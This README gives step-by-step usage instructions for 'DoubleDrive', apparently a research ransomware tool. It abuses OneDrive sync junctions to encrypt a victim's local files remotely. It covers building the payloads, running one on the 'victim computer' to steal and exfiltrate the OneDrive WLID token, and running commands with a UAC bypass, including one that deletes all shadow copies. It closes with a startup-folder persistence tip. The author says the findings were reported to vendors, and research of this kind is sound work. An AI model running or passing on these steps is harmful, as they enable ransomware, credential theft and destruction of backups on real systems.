A DoubleDrive variant that uses OneDrive to encrypt local files remotely.
- Make sure you clone the DoubleDrive repo and install the DoubleDrive python package. If you are currently in the onedrive_doubledrive folder then run:
pip install ../
- Use
config_setup.py
to setup the exact configuration you want for the ransomware. For example:
python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop
- While you are in the onedrive_doubledrive folder, run:
pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\onedrive_doubledrive.py
In case you mentioned the --onedrive-binaries-junction
flag in the previous stage then you should also run:
pyinstaller --onefile --add-data "config.yaml;." .\follow_attacker_commands.py
- A folder named
dist
will be created. Inside you can findendpoint_takeover.exe
andonedrive_doubledrive.exe
- Transfer
endpoint_takeover.exe
to the victim computer and run it. This will create junctions in the OneDrive sync folder that point towards the target folders the contain files to encrypt. It will also extract the WLID token of the OneDrive account and exfiltrate it by sharing it with the email address chosen in the configuration setup stage.
Note - If you chose a temporary email address you should continue to the next step as soon as possible because the generated temporary email address that DoubleDrive uses works for a limited amount of time.
- Execute
onedrive_doubledrive
with the preferred flags on the attacker's computer. For example:
onedrive_doubledrive.exe --remote-ransomware
- In case you passed the
--onedrive-binaries-junction
flag to theconfig_setup.py
script in the configuration setup stage, then you can:- Replace the SharePoint executable located in OneDrive's installation folder by running:
onedrive_doubledrive.exe --replace-sharepoint
- Execute commands using the
--run-command
flag. You can also run them after a UAC bypass was executed if you add the--command-uac-bypass
flag. For example:
onedrive_doubledrive.exe --run-command "vssadmin delete shadows /all /quiet" --command-uac-bypass
As you can read in the blog post I published about this research, the technique of replacing the SharePoint executable located in OneDrive's installation folder depends on the fact that OneDrive.exe
runs Microsoft.SharePoint.exe
when it starts. After I created this technique, and I reported my findings to all the relevant vendors, it now seems that in newer versions of OneDrive the Microsoft.SharePoint.exe
executable is not run anymore every time OneDrive.exe
starts. Seems like there are other triggers for OneDrive.exe
to run Microsoft.SharePoint.exe
, which I have not investigated. If you wish, you can alter DoubleDrive's code to write the follow_attacker_commands.exe
executable to the current user's startup folder instead.